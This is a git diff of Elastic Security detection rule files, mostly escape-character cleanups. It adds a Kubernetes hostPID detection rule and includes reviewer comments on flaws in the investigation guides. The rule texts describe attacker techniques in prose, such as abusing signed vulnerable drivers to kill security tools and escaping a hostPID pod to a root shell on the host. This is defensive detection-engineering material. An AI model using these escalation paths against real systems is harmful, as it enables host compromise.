"query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n",
"references": [
"https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks"
@@ -57,7 +57,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json
index cecc97a677d..6038316db9c 100644
--- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json
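Review bot: The remediation list on the new side closes with `Ensure that the Driver Signature Enforcement is enabled on the system.`, but the guide's own threat model is "known good but vulnerable drivers", which are validly signed and load with signature enforcement on, so that step does not counter the attack this rule targets. The same gap sits in the investigation step `Examine the digital signature of the driver, and check if it's valid.` — a valid signature does not clear a driver here; the useful check is comparing the hash and signer against a known-vulnerable-driver list and blocking by hash/signer (the referenced Elastic Security Labs article is presumably where that control is described, and should be cited for it). Separately, `` `\"dll.Ext.relative_file_name_modify_time\"` `` carries stray escaped quotes inside the backticks, unlike its sibling `` `dll.Ext.relative_file_creation_time` ``, and renders with literal quote characters. These files look generated from the upstream rule source, so both corrections belong there rather than in this package copy; this hunk only changes the `\u003e` escaping.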
+++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json 
@@ -16,7 +16,7 @@ "dll.pe.original_file_name", "dll.code_signature.subject_name" ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. 
Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == 
\\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", "references": [ "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json index 28b49af299c..8647a2e3782 100644 
--- a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json +++ b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json index 09f16ce1c87..9c9c4e34a47 100644 --- a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json index 4f562cf5f0b..58d12ffd1a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/df197323-72a8-46a9-a08e-3f5b04a4a97a_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json index 26fe78ca883..9e406b2ddd9 100644 
--- a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json +++ b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json index 97949cb1ee4..e314a840017 100644 --- a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json +++ b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json index d6a7dd62dfc..ead1f8a6475 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_102.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json index b3b9e3090bf..55d5e90caac 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_103.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json index 53cb42da4c8..76c5cbdd6af 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_104.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json index d1b8bf41cb0..22c52f5f0ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_105.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json index 51656766ff0..7022639c16f 100644 --- a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_106.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json index 544dc8f1379..65dc2f8541e 100644 --- a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json +++ b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_201.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json index 08d9da0e2be..0741e95b255 100644 --- a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json +++ b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_202.json 
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_203.json b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_203.json new file mode 100644 index 00000000000..e496d3777ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df7fda76-c92b-4943-bc68-04460a5ea5ba_203.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a pod attached to the host PID namespace. HostPID allows a pod to access all the processes running on the host and could allow an attacker to take malicious action. When paired with ptrace this can be used to escalate privileges outside of the container. When paired with a privileged container, the pod can see all of the processes on the host. An attacker can enter the init system (PID 1) on the host. From there, they could execute a shell and continue to escalate privileges to root.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the hosts IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective. 
Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\"" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostPID", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.hostPID:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostPID", + "type": "boolean" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df7fda76-c92b-4943-bc68-04460a5ea5ba", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: 
Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "df7fda76-c92b-4943-bc68-04460a5ea5ba_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json b/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json index 7741293124f..c4ba62eb079 100644 --- a/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e00b8d49-632f-4dc6-94a5-76153a481915_1.json @@ -105,7 +105,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json index 71053fb9e0a..672887addf3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json 
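Review bot: The `false_positives` guidance in this new rule file tells analysts to add exceptions on `"kubernetes.audit.requestObject.spec.container.image"` (singular), but the query and `required_fields` both use `kubernetes.audit.requestObject.spec.containers.image` (plural), so an exception written as documented would never match; the text should read `Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.containers.image\"`. Separately, the hard-coded `not kubernetes.audit.requestObject.spec.containers.image: ("docker.elastic.co/beats/elastic-agent:8.4.0")` clause is pinned to one agent tag (stale for an 8.12 package) and, since `containers.image` is multi-valued, suppresses the whole pod whenever any of its containers carries that tag rather than only single-container agent pods; this allowlist is better expressed as a rule exception scoped by namespace or service account than baked into the query. The rule also ships with `"note": ""` while the neighbouring driver rules in this diff carry full triage guides, so a short investigation guide covering hostPID review and the `T1611` context would be worth adding. These files look generated from the upstream detection-rules source, so the fix presumably belongs there rather than in this versioned copy.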
+++ b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json index 416b68325ef..2e7f96ba6d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json index 68732b650e6..68ebcf59871 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_103.json 
@@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json index 4ec961c185c..23bb31683be 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_104.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json index 220ff3acec4..996b1db0a5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json +++ 